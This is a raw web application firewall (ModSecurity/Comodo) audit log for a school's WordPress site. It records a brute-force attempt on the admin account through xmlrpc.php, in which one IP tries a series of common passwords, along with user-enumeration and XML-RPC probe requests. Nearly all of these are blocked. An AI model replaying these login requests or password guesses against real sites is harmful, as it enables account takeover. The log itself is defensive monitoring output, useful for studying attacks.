Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2eb4ce39-Z--
--41b93b44-A--
[19/Apr/2025:19:06:14 +0700] aAORtkruoUXZj665VUGIwgAAAMw 103.236.140.4 50538 103.236.140.4 8181
--41b93b44-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.183.251
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.183.251
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--41b93b44-C--
demo.sayHello
--41b93b44-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--41b93b44-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745064374440766 5969 (- - -)
Stopwatch2: 1745064374440766 5969; combined=4429, p1=621, p2=3550, p3=33, p4=62, p5=97, sr=69, sw=66, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--41b93b44-Z--
--921b6d25-A--
[19/Apr/2025:19:53:31 +0700] aAOcy-vDiFC_ir7MDwbIGwAAAEM 103.236.140.4 45416 103.236.140.4 8181
--921b6d25-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 216
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--921b6d25-C--
wp.getUsersBlogs
admin
12345
--921b6d25-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--921b6d25-E--
--921b6d25-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745067211736988 4695 (- - -)
Stopwatch2: 1745067211736988 4695; combined=3081, p1=464, p2=2487, p3=0, p4=0, p5=77, sr=59, sw=53, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--921b6d25-Z--
--1c5f5d73-A--
[19/Apr/2025:19:54:32 +0700] aAOdCHNa4dA2HllpK_Ne8QAAAIQ 103.236.140.4 51012 103.236.140.4 8181
--1c5f5d73-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--1c5f5d73-C--
wp.getUsersBlogs
admin
r007p455w0rd
--1c5f5d73-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1c5f5d73-E--
--1c5f5d73-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745067272153177 4926 (- - -)
Stopwatch2: 1745067272153177 4926; combined=3460, p1=446, p2=2855, p3=0, p4=0, p5=95, sr=85, sw=64, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1c5f5d73-Z--
--a7cc143f-A--
[19/Apr/2025:19:55:32 +0700] aAOdROvDiFC_ir7MDwbKjgAAAE0 103.236.140.4 56324 103.236.140.4 8181
--a7cc143f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--a7cc143f-C--
wp.getUsersBlogs
admin
admin@2019
--a7cc143f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a7cc143f-E--
--a7cc143f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745067332912369 6825 (- - -)
Stopwatch2: 1745067332912369 6825; combined=4978, p1=741, p2=4057, p3=0, p4=0, p5=108, sr=93, sw=72, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a7cc143f-Z--
--d866f646-A--
[19/Apr/2025:19:56:36 +0700] aAOdhEruoUXZj665VUHbAAAAAMI 103.236.140.4 33378 103.236.140.4 8181
--d866f646-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d866f646-C--
wp.getUsersBlogs
admin
1234554321
--d866f646-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d866f646-E--
--d866f646-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745067396557944 5056 (- - -)
Stopwatch2: 1745067396557944 5056; combined=3709, p1=500, p2=3037, p3=0, p4=0, p5=102, sr=154, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d866f646-Z--
--ac38c556-A--
[19/Apr/2025:19:57:36 +0700] aAOdwHNa4dA2HllpK_NitgAAAIs 103.236.140.4 38696 103.236.140.4 8181
--ac38c556-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ac38c556-C--
wp.getUsersBlogs
admin
servmask
--ac38c556-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ac38c556-E--
--ac38c556-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745067456655014 5252 (- - -)
Stopwatch2: 1745067456655014 5252; combined=4025, p1=476, p2=3360, p3=0, p4=0, p5=112, sr=106, sw=77, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ac38c556-Z--
--6344c962-A--
[19/Apr/2025:19:58:45 +0700] aAOeBevDiFC_ir7MDwbOuwAAAEs 103.236.140.4 45340 103.236.140.4 8181
--6344c962-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--6344c962-C--
wp.getUsersBlogs
admin
asdasd123
--6344c962-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6344c962-E--
--6344c962-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (18+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745067525251726 6155 (- - -)
Stopwatch2: 1745067525251726 6155; combined=4426, p1=614, p2=3560, p3=0, p4=0, p5=146, sr=159, sw=106, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6344c962-Z--
--8f196851-A--
[19/Apr/2025:19:59:47 +0700] aAOeQ3Na4dA2HllpK_NmSAAAAIY 103.236.140.4 51084 103.236.140.4 8181
--8f196851-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--8f196851-C--
wp.getUsersBlogs
admin
admin1992
--8f196851-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8f196851-E--
--8f196851-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (30+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745067587758594 4897 (- - -)
Stopwatch2: 1745067587758594 4897; combined=3321, p1=414, p2=2761, p3=0, p4=0, p5=86, sr=73, sw=60, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8f196851-Z--
--6d5c276e-A--
[19/Apr/2025:20:00:47 +0700] aAOef-vDiFC_ir7MDwbQ1QAAAE0 103.236.140.4 56042 103.236.140.4 8181
--6d5c276e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--6d5c276e-C--
wp.getUsersBlogs
admin
steelers
--6d5c276e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6d5c276e-E--
--6d5c276e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (15+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745067647843393 4066 (- - -)
Stopwatch2: 1745067647843393 4066; combined=2744, p1=361, p2=2261, p3=0, p4=0, p5=73, sr=55, sw=49, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6d5c276e-Z--
--84215b33-A--
[19/Apr/2025:20:01:48 +0700] aAOevA6cTFSgLAHl7PrDHgAAABQ 103.236.140.4 32928 103.236.140.4 8181
--84215b33-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--84215b33-C--
wp.getUsersBlogs
admin
Marketing2018_
--84215b33-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--84215b33-E--
--84215b33-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745067708158028 5293 (- - -)
Stopwatch2: 1745067708158028 5293; combined=3733, p1=476, p2=3040, p3=0, p4=0, p5=126, sr=126, sw=91, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--84215b33-Z--
--56d6894d-A--
[19/Apr/2025:20:02:48 +0700] aAOe-EruoUXZj665VUHikQAAAME 103.236.140.4 37064 103.236.140.4 8181
--56d6894d-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 217
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--56d6894d-C--
wp.getUsersBlogs
admin
999999
--56d6894d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--56d6894d-E--
--56d6894d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (17+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745067768323214 5663 (- - -)
Stopwatch2: 1745067768323214 5663; combined=3877, p1=476, p2=3210, p3=0, p4=0, p5=113, sr=104, sw=78, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--56d6894d-Z--
--ab58c658-A--
[19/Apr/2025:20:03:48 +0700] aAOfNHNa4dA2HllpK_NqgQAAAJY 103.236.140.4 41960 103.236.140.4 8181
--ab58c658-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ab58c658-C--
wp.getUsersBlogs
admin
manager
--ab58c658-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ab58c658-E--
--ab58c658-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (20+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745067828024605 5856 (- - -)
Stopwatch2: 1745067828024605 5856; combined=4061, p1=491, p2=3373, p3=0, p4=0, p5=114, sr=86, sw=83, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ab58c658-Z--
--08974a49-A--
[19/Apr/2025:20:04:50 +0700] aAOfcnNa4dA2HllpK_NrqwAAAJE 103.236.140.4 47068 103.236.140.4 8181
--08974a49-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--08974a49-C--
wp.getUsersBlogs
admin
ladybug
--08974a49-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--08974a49-E--
--08974a49-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745067890495282 6391 (- - -)
Stopwatch2: 1745067890495282 6391; combined=4534, p1=599, p2=3731, p3=0, p4=0, p5=119, sr=72, sw=85, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--08974a49-Z--
--9f8ceb4c-A--
[19/Apr/2025:20:05:44 +0700] aAOfqHNa4dA2HllpK_NssQAAAIU 103.236.140.4 51206 103.236.140.4 8181
--9f8ceb4c-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.76.69
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.76.69
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--9f8ceb4c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9f8ceb4c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745067944823973 2738 (- - -)
Stopwatch2: 1745067944823973 2738; combined=1212, p1=396, p2=783, p3=0, p4=0, p5=32, sr=85, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9f8ceb4c-Z--
--41e02874-A--
[19/Apr/2025:20:05:48 +0700] aAOfrHNa4dA2HllpK_Ns1wAAAIU 103.236.140.4 51474 103.236.140.4 8181
--41e02874-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.76.69
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.76.69
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--41e02874-C--
demo.sayHello
--41e02874-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--41e02874-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745067948148104 6014 (- - -)
Stopwatch2: 1745067948148104 6014; combined=4699, p1=559, p2=3847, p3=51, p4=72, p5=101, sr=75, sw=69, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--41e02874-Z--
--4126cf17-A--
[19/Apr/2025:20:05:56 +0700] aAOftA6cTFSgLAHl7PrIDwAAAA0 103.236.140.4 52082 103.236.140.4 8181
--4126cf17-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--4126cf17-C--
wp.getUsersBlogs
admin
marketing2020_
--4126cf17-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4126cf17-E--
--4126cf17-H--
